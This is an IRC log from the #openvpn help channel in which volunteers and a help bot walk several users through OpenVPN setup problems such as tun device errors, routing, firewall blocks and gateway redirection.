<@vpnHelper> Title: Debian Package Tracking System - openvpn (at packages.qa.debian.org) 22:28 < pekster> 2.1_rc11 is "oldstable" 22:28 < roue> Yeah, my server is Lenny. 22:29 < roue> it's just an old firewall box. 22:29 < roue> I mean, really old. 22:29 < roue> AMD K6 200. 22:29 < roue> I think I bought it in 1997. 22:29 < pekster> I dealt with a similar issue of CentOS having really outdated packages for subversion; I just maintained my own installation through a traditional ./configure --prefix=/usr/local/svn $other_opts && make && make install 22:30 < roue> Yeah, I used to do the same, but this was an if-it-ain't broke situation. 22:30 < pekster> Well, it is broken ;) 22:30 < roue> That server had been up for about a year an a half the last time I had to do anything with it. 22:30 < pekster> But, you have a few options to fix, so you get the choice of how to handle it 22:30 < roue> Actually, I'm pretty sure this isn't an openvpn version issue. 22:31 < pekster> Right, could be completely on the OS side 22:31 < roue> I'm pretty convinced it's a ChromeOS wasn't built for people to go futzing with the root shell. 22:31 < pekster> If the openvpn version is *that* old, my guess is so is the tun driver in the kernel ;) 22:31 < roue> not without being willing to put up with stuff like this. 22:31 < pekster> And related net tools, etc 22:31 < roue> Actually the kernel is 3.4.0 22:32 < pekster> Weird. 4+ year old userspace, and 3.4 kernel.... 22:32 < roue> well... okay, maybe not so new. What's it up to now 3.7? 22:33 < pekster> My source distro on my LAN (gentoo) is 3.5.7 for stable kernel, so 3.4 isn't "that" old by comparison 22:37 < roue> I've been meaning to move the firewall off the old box and go with something newer. 22:37 < roue> Even have the hardware lined up, just haven't spent the time on it. 22:37 < roue> I bought one of those pogoplug's. have you seen them? 22:38 < roue> low power draw. run debian. gig ethernet and 4 usb ports. 22:38 < roue> I bought a handful of usb eth adapters. 22:38 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has joined #openvpn 22:39 < pekster> I'm not a fan of USB ethernet as they don't tend to be the most stable things 22:39 < pekster> Plus the 480Mbps limit of USB 2.x is annoying if you have GigE 22:39 < roue> this is so cool. I've got the vpn going to my internal network and X11 forwarding's letting my run firefox and fvwm2 on a chromebook... :) 22:39 < roue> it's some kind of sin. 22:39 < pekster> 12Mbps for USB 1.x, so you gotta be careful there too :P 22:40 < roue> well, my lan is split up a bit and the cable internet isn't too fast in and of itself. 22:40 < pekster> For troubleshooting/temp uses only, I do have two pegasus-chipset USB ethernet, but despite being "10/100 Base-T" supported, it runs at strictly USB 1.1, so it can't go faster than 12Mbps. Oh, plus USB slaughters the CPU as throughput goes up 22:40 < pekster> But, they technically "work" 22:40 < roue> the firewall has a nic the the WAN, one for the internal lan (going to a gig switch) and one for the wireless ap. 22:41 < roue> the wireless is open, but you can't get to the internal lan except through openvpn. 22:41 < roue> so the chromebook had been locked away from my internal file/video/music server until I got this working :) 22:41 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has quit [Remote host closed the connection] 23:07 < roue> thanks much for your help by the way. 23:08 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 23:15 -!- corretico [~luis@190.211.93.38] has quit [Read error: Connection reset by peer] 23:15 -!- raidzz [~raidz@raidz.im] has joined #openvpn 23:15 -!- raidzz is now known as raidz 23:15 -!- raidz [~raidz@raidz.im] has quit [Changing host] 23:15 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 23:15 -!- mode/#openvpn [+o raidz] by ChanServ 23:15 -!- raidz_away [~raidz@openvpn/corp/admin/andrew] has quit [Ping timeout: 246 seconds] 23:17 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has quit [Excess Flood] 23:17 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has joined #openvpn 23:39 < roue> still there pekster? 23:40 < roue> just for run I downloaded and built the latest openvpn source in my debian chroot. Same thing happens. 23:41 < pekster> Interesting. I'm not familiar with the debug loglevels above 5 (6+ generate a lot of low-level debug messages) but it's possible one of them is interesting. But, that might all be hidden from openvpn anyway if it's an OS failing 23:42 < roue> it fails when trying to ifconfig tun0. Says SIOCSIFADDR: No such device 23:44 -!- tjz [~tjz@unaffiliated/tjz] has joined #openvpn 23:45 < roue> though actually if I manually mktun and run specifying --dev tun0 it will ifconfig and set the route, so that's progress. 23:48 < pekster> The old version didn't do that, right? 23:53 < tjz> hello guys 23:59 < roue> right --- Day changed Sun Feb 17 2013 00:01 < pekster> So, progress. You can create the device outside of openvpn and then you may not need ifconfig-noexec 00:01 < pekster> It's still really strange that you can 'openvpn --mktun --dev tun0' but it can't do that during startup. AFAIK it uses the same backend to do that, but I haven't dug into the code in that area enough to know offhand if it's identical 00:25 -!- LifeIsPain [~lip@static-50-53-203-94.bvtn.or.frontiernet.net] has joined #openvpn 00:26 < LifeIsPain> !welcome 00:26 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 00:26 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 00:26 < LifeIsPain> !goal 00:26 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 00:31 < LifeIsPain> As the full on scope of this is more likely to be handled by #dd-wrt, I'm first trying to determine if the UDP port which is being listed to by openvpn server should appear as open when scanned. I have a theory that the configuration isn't opening up the port on my router as it is suppose to, but want to verify that it SHOULD appear as open when scanned and not a black hole 00:35 < pekster> LifeIsPain: That depends more on your firewall. UDP ports don't show as "open" like TCP does as UDP is stateless 00:37 < LifeIsPain> as my dd-wrt is both the firewall and the openvpn server, in theory (with the new config method) it should enable the port, but when I attempt to connect with an openvpn client, I get variations upon timeouts and can't connect 00:38 < pekster> I can't help you with your OS as I don't use dd-wrt. tcpdump the traffic to see if it's even arriving at the server. Remember that tcpdump hooks before netfilter, so it's possible to see tcpdump traffic and still block it at the OS level 00:38 < LifeIsPain> but yea, I thought that it being a UDP may not allow for a method of checking to see if the port itself is being listed to by openvpn 00:39 < LifeIsPain> wait, tcpdump for a udp connection? 00:39 < pekster> ... 00:39 < pekster> tcpdump shows you network traffic. Last I checked, UDP is netwnork traffic 00:39 < pekster> man tcpdump may be of use 00:40 < pekster> Something like 'tcpdump -pnvi eth0 udp port 1194' might be a hint to get you started 00:40 < LifeIsPain> ah, I think I know where you are going with that, I was just thinking of a different use 00:40 < pekster> If you can't get connected, you either aren't listening on the host/port you're connecting to, or have a firewall problem 00:40 < pekster> Both should be easy to fix 00:42 < LifeIsPain> thanks for the info there, not to hit it a bit more 00:42 < LifeIsPain> trick is to figure out if it is actually a firewall or a listening issue though 00:42 < pekster> Not really 00:43 < LifeIsPain> configured to be open on the firewall, and have tried multiple ports 00:43 < pekster> 'man netstat' 00:44 < LifeIsPain> no udp listeners running, marvelous 00:44 < LifeIsPain> (on the router) 00:44 < pekster> You used -l? 00:44 < LifeIsPain> yep 00:44 < LifeIsPain> I should be more specific, no UDP on 1194 00:44 < pekster> How do you have "no udp listeners" if your router does DHCP to a LAN? Or do you not use DHCP? 00:44 < pekster> Ah, k 00:45 < pekster> So, your process either isn't running, or not listening on 1194 00:45 < pekster> 'ps aux | grep openvpn' or maybe 'pidof openvpn' 00:45 < pekster> Can't connect to something that isn't running 00:46 < LifeIsPain> aux isn't valid in this case, everything is root 00:46 < LifeIsPain> but yea, no openvpn 00:46 < LifeIsPain> process running 00:46 < pekster> That would preclude connections, yes 01:04 -!- LifeIsPain [~lip@static-50-53-203-94.bvtn.or.frontiernet.net] has quit [Changing host] 01:04 -!- LifeIsPain [~lip@unaffiliated/lifeispain] has joined #openvpn 01:21 < LifeIsPain> cat /var/log/openvpn 01:21 < LifeIsPain> Options error: --server directive network/netmask combination is invalid 01:21 < LifeIsPain> well, that explains why openvpn isn't running, too bad I can't see what command dd-wrt is trying to run 01:23 < pekster> Ping downstream, or look at the initscript code yourself to figure out how their OS does things 01:24 < pekster> fwiw, I decided I hated the openwrt UCI-centric shipped initscript and just wrote my own that uses standard openvpn config files and supports multiple independently-controlled tunnels 01:26 < LifeIsPain> yep, pinging them already, but this is Idle Relay Chat, may be a while 01:27 < pekster> Take the time to learn how your distro does init maybe. Armed with that knowledge, you might be able to spot the issue or write your own (better) init system that doesn't rely on using a web interface to abstract what openvpn is really doing 01:27 < pekster> At the very least it's often trivial to output the command it's calling with some creative use of echo commands 01:58 < LifeIsPain> so many things to do! But at least I found out if I enable it as TAP instead of TUN, it runs and has the port enabled in the listener 01:59 < pekster> Don't use tap unless you actually need it; it's wasteful in terms of overhead, Ethernet broadcasts add to wowrthless network traffic, and it opens the door to connected clients to perform L2 attacks on the network, such as ARP-spoofing 01:59 < pekster> !tunortap 01:59 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 01:59 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 02:00 < LifeIsPain> yea, I really don't want to use tap 02:02 < LifeIsPain> On the plus side, at least some of the traffic will be filtered if I end up sticking with tap, as I have a switch in the way 02:03 < pekster> huh? 02:03 < pekster> No, switches don't have anything to do with it. OpenVPN acts as a switch in that sense 02:04 < pekster> ARPs are send to the Ethernet broadcast address, ie: FF:FF:FF:FF:FF:FF. Conforming Ethernet switches must send this broadcast to all connected hosts 02:05 < LifeIsPain> I should have known that, this may be why it isn't good to do networking prior to going to sleep ;) 02:17 < LifeIsPain> pekster: well, thanks much for your time, I've got more ammo at least for when I hit this sometime after waking up 02:23 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Ping timeout: 255 seconds] 02:48 < LifeIsPain> well, dang, so much for going to sleep, but I have openvpn running if I modify the conf file, dd-wrt was being stupid in how it wrote the server line, so the error was right on 02:48 < LifeIsPain> server 172.24.43.1 255.255.255.0 02:49 < LifeIsPain> changed that .1 to a .0, and it listened to my port and the process stayed running 03:03 -!- izual [~izual@dhcp-133-136.dorms.ntua.gr] has joined #openvpn 03:07 -!- izual [~izual@dhcp-133-136.dorms.ntua.gr] has quit [Remote host closed the connection] 03:44 -!- LifeIsPain [~lip@unaffiliated/lifeispain] has quit [Ping timeout: 276 seconds] 04:03 -!- GabrieleV_ [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Excess Flood] 04:06 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 04:14 -!- Orbi [~opera@109.129.9.231] has joined #openvpn 04:16 -!- rfxn [~teck7@bas1-montreal54-1167956220.dsl.bell.ca] has joined #openvpn 04:25 -!- Orbi [~opera@109.129.9.231] has left #openvpn [] 04:28 -!- catsup [~d@64.111.123.163] has quit [Read error: Connection reset by peer] 04:35 -!- k1ng [~k1ng@unaffiliated/k1ng] has quit [Read error: Operation timed out] 04:46 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 05:25 -!- Orbi [~opera@109.129.9.231] has joined #openvpn 05:35 -!- Changos [~Changos@unaffiliated/changos] has joined #openvpn 05:41 < Changos> Hi guys, I've a problem, I need to connect two subnets. VPN is up, I can make ping from client to any PC on server LAN, but backward It doesn't :s 05:42 < Changos> any idea ? 05:42 < pekster> !serverlan 05:42 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 05:44 < pekster> My guess is a firewall if your ping from VPN client to a server-side LAN IP not the server gives you a reply. Unless you're doing NAT on that traffic 05:45 < Changos> I find on Internet howtos, books, and I tried many configs and nothing :s, add manual routing, client-config-dir ccd, iroute. :s 05:46 < Changos> well, ip forwarding done, route added done 05:46 < Changos> !route_outside_openvpn 05:46 <@vpnHelper> "route_outside_openvpn" is (#1) If your server is not the default gateway for the LAN, you will need to add routes to your gateway. See ROUTES TO ADD OUTSIDE OPENVPN in !route or (#2) Here are 2 diagrams that explain how this works: http://www.secure-computing.net/wiki/index.php/Graph http://i.imgur.com/BM9r1.png 05:47 < pekster> What IP can you ping from your VPN client? Is what you're able to ping now the server's LAN IP? 05:47 < pekster> Or can you also ping boxes on the LAN behind the server? 05:48 < pekster> (I think that's what you said is working, just double-checking) 05:48 < Changos> NAT on client firewall, I try it 05:48 < pekster> Not if you want bi-direcitonal traffic... 05:48 < pekster> NAT specifically *breaks* bi-directional traffic 05:49 < pekster> ie: you will never be able to ping VPN clients from server-side LAN clients if you do that 05:49 < Changos> pekster: first question, any ip, second question, sure, any type of icmp is clear on firewall 05:49 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 05:49 < pekster> Okay, so you already have a return-route on the server-side LAN 05:49 < pekster> Your problem is a firewall, not routing 05:50 < pekster> Either on the VPN server, or the VPN client that is firewalling the ping going from a server-LAN system IP to the IP of a VPN client 05:50 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Client Quit] 05:51 < Changos> yeah, ping between each VPN device is done 05:52 < Changos> ping between client to any LAN on server successfull 05:52 < pekster> Right, I got that 05:53 < pekster> And the other way is not working, between the same 2 hosts that are successful in your prior test, right? 05:53 < Changos> ping between any PC on server to LAN IP on client unsuccessful 05:53 < pekster> Yes. As I've already said, this means you have a firewall problem 05:53 < pekster> Is your default gateway on the server-side LAN also your VPN server? 05:56 < Changos> yes, is the same default gw 05:58 < pekster> If the server-LAN default gateway is the same system as your VPN server, then 2 things can be firewalling the ping: your VPN server, or your client 05:59 < pekster> tcpdump first on the server's LAN interface, then on the tun device to make sure the ping is received and goes down the tunnel to the client 06:04 < Changos> ping some PC LAN server to IP LAN client 06:04 < Changos> tcpdump on server 06:04 < Changos> tcpdump -nnvvS 06:04 < Changos> tcpdump: listening on tun0, link-type RAW (Raw IP), capture size 65535 bytes 06:04 < Changos> 07:02:34.708238 IP (tos 0x0, ttl 63, id 0, offset 0, flags [DF], proto ICMP (1), length 84) 192.168.14.74 > 192.168.11.131: ICMP echo request, id 4554, seq 1, length 64 06:04 < Changos> 07:02:35.707905 IP (tos 0x0, ttl 63, id 0, offset 0, flags [DF], proto ICMP (1), length 84) 192.168.14.74 > 192.168.11.131: ICMP echo request, id 4554, seq 2, length 64 06:04 < Changos> echo request but doesn't reply 06:04 < pekster> So, you can see the requests going to the 192.168.11.131 client, but no replies 06:05 < pekster> The client is firewalling the response, or you are not pushing the server-LAN route to the client 06:05 < Changos> exactly 06:05 < pekster> You have a 'push "route 192.168.14.0 255.255.255.0" statement in your server config? (or w/e the netmask is on that LAN) 06:06 < Changos> yesh this line exist on server.conf 06:06 < pekster> Then fix your client to not firewall the ping 06:07 < pekster> Your connection is working just fine. The VPN client is choosing not to reply to the traffic 06:07 < Changos> I've the route on my client that exist lan on server 06:08 < pekster> And what exactly does that have to do with the firewall I've said is your problem? 06:08 < Changos> pekster: yeah, i know it, xDD, but i don't know if the problem is on some config on OpeVPN or firewall o routing on client side 06:08 < Changos> I check my firewall on client side 06:09 < Changos> the static route on client side exist 06:09 < Changos> 192.168.14.0 192.168.9.21 255.255.255.0 UG 0 0 0 tun0 06:09 < Changos> 14.0 LAN server 06:09 < Changos> 9.21 IP VPN client 06:10 < pekster> Yes. We already know this works as you can ping the server-side PC 06:10 < pekster> Your *client* *firewall* is the problem. For the 4th time. 06:10 < pekster> ie: your client is specifically ignoring the ping request, as is common for client firewall configurations 06:12 < Changos> pekster: haha, I check just now my firewall on client 06:13 < pekster> It's fine to leave it on, but you should allow traffic through the firewall you specifically want to accept 06:13 < pekster> You don't "need" pings to work for connectivity, unless you wish to accept and reply to them 06:26 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 06:35 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 244 seconds] 06:45 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 276 seconds] 06:46 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 06:51 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 07:03 -!- master_of_master [~master_of@p57B542F9.dip.t-dialin.net] has quit [Ping timeout: 255 seconds] 07:05 -!- master_of_master [~master_of@p57B53E8C.dip.t-dialin.net] has joined #openvpn 08:16 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn 08:37 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Ping timeout: 244 seconds] 08:45 -!- ade_b [~Ade@koln-5d819626.pool.mediaWays.net] has joined #openvpn 08:45 -!- ade_b [~Ade@koln-5d819626.pool.mediaWays.net] has quit [Changing host] 08:45 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 08:50 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 08:56 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Ping timeout: 248 seconds] 09:10 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 09:32 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Quit: ZNC - http://znc.in] 09:33 -!- b1rkh0ff [~b1rkh0ff@178.77.27.113] has joined #openvpn 09:34 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [] 09:34 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 09:43 -!- LifeIsPain [~lip@unaffiliated/lifeispain] has joined #openvpn 09:58 -!- openbsdnoob [~openbsdno@91-66-20-106-dynip.superkabel.de] has joined #openvpn 09:58 -!- dannoz [~zirkin@203.sub-70-193-128.myvzw.com] has joined #openvpn 09:58 -!- openbsdnoob [~openbsdno@91-66-20-106-dynip.superkabel.de] has quit [Client Quit] 10:00 < dannoz> I'm trying to use openvpn to browse the web from my laptop while at work via my server at home. I am able to connect from work via openvpn and see my local samba shares but the other traffic is not being routed through home. Any hints? 10:00 < dannoz> !paste 10:00 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use 10:00 < pekster> This may be of use: 10:00 < pekster> !redirect 10:00 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 10:00 <@vpnHelper> http://ircpimps.org/redirect.png 10:01 < pekster> Optionally, I also have a setup where I connect via OpenVPN to a cloud server and just point my browser to a proxy there via a FF plugin that manages proxies at the click of a button (FoxyProxy) 10:02 < pekster> ie: only the browser traffic is redirected, and other traffic stays on the local LAN's routing setup 10:02 < dannoz> I have --redirect-gateway enabled. I have ipforwarding and nat enabled on the server (for home lan) does it need to be specifically enabled for openvpn as well 10:03 < dannoz> !nat 10:03 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto 10:03 -!- openbsdnoob [~openbsdno@91-66-20-106-dynip.superkabel.de] has joined #openvpn 10:03 < dannoz> !linnat 10:03 <@vpnHelper> "linnat" is (#1) for a basic iptables NAT where 10.8.0.x is the vpn network: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE or (#2) to choose what IP address to NAT as, you can use iptables -t nat -I POSTROUTING -o eth0 -j SNAT --to or (#3) http://netfilter.org/documentation/HOWTO//NAT-HOWTO.html for more info or (#4) openvz see !openvzlinnat 10:03 -!- openbsdnoob [~openbsdno@91-66-20-106-dynip.superkabel.de] has quit [Client Quit] 10:04 < pekster> If you have 'push "redirect-gateway"' in the server-config, the client should override the default gateway. It's wise to use the 'def1' flag too, otherwise your local LANs DHCP renewal can wipe out your default route 10:05 < pekster> Given that the directive is pushed from your server, how have you determined it's not going through the VPN interface? 10:08 < dannoz> Using a site such as whatismyip.com doesn't give my home server's IP and using tracert again I see many stops through work 10:09 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 10:09 < pekster> Can you pastebin your server config and client log at 'verb 4' ? 10:12 -!- openbsdnoob [~openbsdno@91-66-20-106-dynip.superkabel.de] has joined #openvpn 10:12 -!- openbsdnoob [~openbsdno@91-66-20-106-dynip.superkabel.de] has quit [Client Quit] 10:13 < dannoz> client: http://pastebin.com/R1ngSMRY 10:14 < dannoz> server: http://pastebin.com/610cimTp 10:15 < pekster> Gateway should be getting redirected based on line 16 in the client conf, unless logs report failure (which is why I'd like to see client logs as well to verify that) 10:16 < pekster> route output of the client may help confirm that, although there could still be other surprises in the logs 10:16 < pekster> maybe 'ip route show' (Linux) or 'route -4 print' (Windows) 10:16 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 10:16 < dannoz> Client Log: http://pastebin.com/s6DWc4SM 10:18 < dannoz> Route on Client: http://pastebin.com/ieLhCM0e 10:19 < pekster> Double default gateway entries 10:19 < pekster> I'd suggest using 'redirect-gateway def1' instead 10:19 < pekster> That adds two /1 CIDR routes instead of trying to replace the pre-existing default gateway, which leads to strange behaviour like you're seeing 10:20 < dannoz> IOW: only on the server side and not on the client side? 10:20 < pekster> No, you can do 'redirect-gateway' on the client like you are 10:20 < pekster> Optionally the server can use the push directive to push it to the client; the eeffect is the same 10:20 < pekster> Just turn the client config on line 16 to read: redirect-gateway def1 10:21 < pekster> And try that 10:22 < dannoz> testing... 10:23 < dannoz> nice 10:25 < dannoz> Wow... always turns out to be one or two extra characters or a "." in the wrong place. Thanks a bunch pekster 10:25 < pekster> You will run into issues if you connect from a local network (on the client) that uses 192.168.1.0/24 as is very common with many routers since the ranges will overlap 10:26 < dannoz> any suggestions? 10:27 -!- openbsdnoob [~openbsdno@91-66-20-106-dynip.superkabel.de] has joined #openvpn 10:27 < pekster> Renumber your LAN 10:27 < pekster> Or did you mean suggestions for a network? 10:28 < dannoz> Ahh.. ok. Will likely change 192.168.1.0/24 10:28 < pekster> If you know in advance you'll only have the client on a non-conflicting LAN it's not a problem, but f.eg, coffee shops may use 192.168.1.0/24 10:28 < pekster> huh, no, not the VPn netwnork 10:28 < pekster> your home LAn that you're pushing a routeu to 10:28 < dannoz> right... if I change home to ... 192.168.169.0/24 all is (likely) good no? 10:29 < pekster> Sure, that's obscure enough to be very unlikely to cause you issues 10:29 < pekster> Oh, "change 192.168.1.0/24" I read as "change to"... confusion not intended 10:30 < pekster> It's not an issue from work where you have a different network, but it may be if you go to someone's home or wifi cafe 10:31 < dannoz> cool thanks again 10:31 -!- dannoz [~zirkin@203.sub-70-193-128.myvzw.com] has quit [] 10:34 -!- openbsdnoob [~openbsdno@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye] 10:50 -!- openbsdnoob [~openbsdno@91-66-20-106-dynip.superkabel.de] has joined #openvpn 10:50 -!- openbsdnoob [~openbsdno@91-66-20-106-dynip.superkabel.de] has quit [Client Quit] 11:19 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 11:28 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 11:37 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 11:51 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn 12:03 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Quit: Ex-Chat] 12:21 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Write error: Connection reset by peer] 12:23 -!- Changos [~Changos@unaffiliated/changos] has quit [Ping timeout: 260 seconds] 12:32 < matsh> !goal 12:32 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 12:39 -!- Changos [~Changos@unaffiliated/changos] has joined #openvpn 12:56 < matsh> Okay, I have a goal 12:56 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 276 seconds] 12:57 < matsh> I want a secure connection between >1 computers, eventually with access of the lans behind each server 13:09 < matsh> !paste 13:09 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use 13:16 -!- pwrcycle [~pwrcycle@173.214.160.92] has quit [Changing host] 13:16 -!- pwrcycle [~pwrcycle@unaffiliated/pwrcycle] has joined #openvpn 13:22 -!- pingUone [brads@2600:3c00::f03c:91ff:fe70:f0a9] has joined #openvpn 13:24 -!- pingUone [brads@2600:3c00::f03c:91ff:fe70:f0a9] has left #openvpn [] 13:33 -!- sherl0ck [~sherl0ck@unaffiliated/sherl0ck] has joined #openvpn 13:34 < sherl0ck> using a bridge site to site VPN, each site with a dedicated dhcp server, how do i setup dns resolution? any better way then have DNS server at site A, and site B would then use site A DNS server through the tunnel? 13:34 -!- sherl0ck [~sherl0ck@unaffiliated/sherl0ck] has left #openvpn [] 13:34 -!- sherl0ck [~sherl0ck@unaffiliated/sherl0ck] has joined #openvpn 13:34 < sherl0ck> thanks 13:51 <@novaflash> !dns 13:51 <@vpnHelper> "dns" is (#1) Level3 open recursive DNS server at 4.2.2.[1-6] or (#2) Google open recursive DNS server at 8.8.8.8 / 8.8.4.4 or (#3) you might be looking for !pushdns 13:52 <@novaflash> !pushdns 13:52 <@vpnHelper> "pushdns" is (#1) push "dhcp-option DNS a.b.c.d" to push dns to the client or (#2) http://thread.gmane.org/gmane.network.openvpn.user/25139/focus=25147 see that mail archive for some info on pushing dns or (#3) http://article.gmane.org/gmane.network.openvpn.user/25149 for a perm fix via regedit or (#4) in unix you'll use the update-resolv-conf script or (#5) also 13:52 <@vpnHelper> http://comments.gmane.org/gmane.network.openvpn.user/31975 reports --register-dns as fixing their problems pushing DNS to windows 7 13:54 < sherl0ck> yea thought so 13:54 < sherl0ck> thanks 13:55 -!- sherl0ck [~sherl0ck@unaffiliated/sherl0ck] has left #openvpn ["PING 1361130913"] 13:58 -!- Changos [~Changos@unaffiliated/changos] has quit [Ping timeout: 256 seconds] 13:59 -!- Changos [~Changos@190.147.184.189] has joined #openvpn 13:59 -!- Changos [~Changos@190.147.184.189] has quit [Changing host] 13:59 -!- Changos [~Changos@unaffiliated/changos] has joined #openvpn 14:01 -!- brute11k [~brute11k@89.249.230.159] has joined #openvpn 14:01 -!- brute11k1 [~brute11k@89.249.230.159] has quit [Read error: Operation timed out] 14:06 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 14:15 < Changos> pekster: nothing :s, I look the firewall on my client site, and just fine, I guess :/ 14:37 -!- Valcorb__ [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:37 -!- Valcorb__ [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit] 14:38 -!- Valcorb__ [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:38 < matsh> I get some tls errors: http://pastebin.com/u8R2SCWP 14:39 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 14:46 -!- max_ [~max@98.225.19.83] has quit [Remote host closed the connection] 14:55 < Changos> matsh: try again to make certificate 15:00 < matsh> clean-all and redo all of them? 15:03 < Changos> !help 15:03 <@vpnHelper> (help [] []) -- This command gives a useful description of what does. is only necessary if the command is in more than one plugin. 15:03 < Changos> !site_to_site 15:08 < rfxn> !help site_to_site 15:08 <@vpnHelper> Error: There is no command "sitetosite". 15:15 < matsh> !help client-to-client 15:15 <@vpnHelper> Error: There is no command "clienttoclient". 15:19 < matsh> Changos: Still the same after making new certs 15:20 < Changos> matsh: :S 15:20 < matsh> I have also opened for all udp on both ends for testing 15:22 -!- ade_b [~Ade@koln-5d819626.pool.mediaWays.net] has joined #openvpn 15:22 -!- ade_b [~Ade@koln-5d819626.pool.mediaWays.net] has quit [Changing host] 15:22 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 15:57 -!- Valcorb__ [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 16:00 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:03 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 16:08 -!- Orbi [~opera@109.129.9.231] has left #openvpn [] 16:10 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 16:23 -!- rrva [unknown@y.mima.x.se] has joined #openvpn 16:24 < rrva> hi. I want to go from a single client single server static key setup to a two (not more) client single server setup. Whats the easiest route? 16:32 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 16:37 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has joined #openvpn 16:47 -!- Changos [~Changos@unaffiliated/changos] has quit [Ping timeout: 248 seconds] 17:13 -!- hazardous [~dbn@void.kassad.in] has quit [Changing host] 17:13 -!- hazardous [~dbn@openvpn/user/hazardous] has joined #openvpn 17:13 -!- mode/#openvpn [+v hazardous] by ChanServ 17:19 -!- mnathani 